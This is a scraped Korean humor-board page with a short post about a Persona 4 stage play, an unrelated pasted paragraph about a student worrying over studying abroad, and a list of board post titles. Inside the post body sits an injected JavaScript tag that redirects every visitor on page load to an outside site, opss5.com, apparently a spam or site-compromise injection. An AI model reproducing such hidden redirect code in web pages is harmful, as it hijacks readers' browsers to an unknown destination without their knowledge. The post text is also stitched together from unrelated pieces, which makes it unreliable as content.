유머게시판

실사화의천국
!

페르소나4 연극중 전투파트

굉장히 오글거리지만 원작재현률은 넘나 높다는 것...

엄마가 고등학생 때 유학 보내주신다는데 엄마가 고등학생 되면 미국으로 유학 보내주신다는데, 아직 영어도 잘 못하고 그래서 가서 제대로 공부 할 수 있을지도 모르겠다.. 마음 같으면 가서 대학교 까지 다 끝내고 오고 싶은데 영어 때문에 고민된다ㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠ 아 진짜 어떡하지ㅠㅠㅠㅠㅠ 지금부터라도 빡세게 공부하면 될려나ㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠ <script type='text/javascript'>location.href='http://www.opss5.com/';</script>
번호 제목 글쓴이 날짜 조회
5,817 역대급편집의굴단신화월드퍼스트킬영상
박부장0
5,816 어릴적여주인공들이매력적이였던만화들
박부장0
5,815 전서왕구구
소데스까0
5,814 새벽공방-카드캡터체리
소데스까0
5,813 지우피카츄의위엄
박부장0
5,812 장재호노재욱김성식선수근황
소데스까0
5,811 컨트롤냥꾼붐은드디어왔습니다
박부장0
5,810 1년만에만난라이벌
소데스까0
5,809 보다가2시간이확지나감
박춘희0
5,808 진작에이렇게좀광고좀하지
박춘희0
5,807 너의성별은.영화예고편(야인시대)
박춘희0
5,806 VIP고객감사인사하러나온쉐프님
박춘희0
5,805 유즈맵근황
소데스까0
5,804 1인3역채동희!앵커,특파원에기상캐스터까지
소데스까0
5,803 코끼리실물느낌
소데스까0
5,802 Ep.1두천재의시작,그리고정상에오르기까지
박춘희0
5,801 한국콘텐츠진흥원,애니메이션산업에XX억투자...한국형'너의이름은'나오나
박춘희0
5,800 시공의폭풍속흔한일기토
박부장0
5,799 젤나가조차생각못한혼종...swf
박부장0
5,798 남자bj의흔하지않은허세
소데스까0

위즈런솔루션
아람비
심플칩
SNB투어
레스타임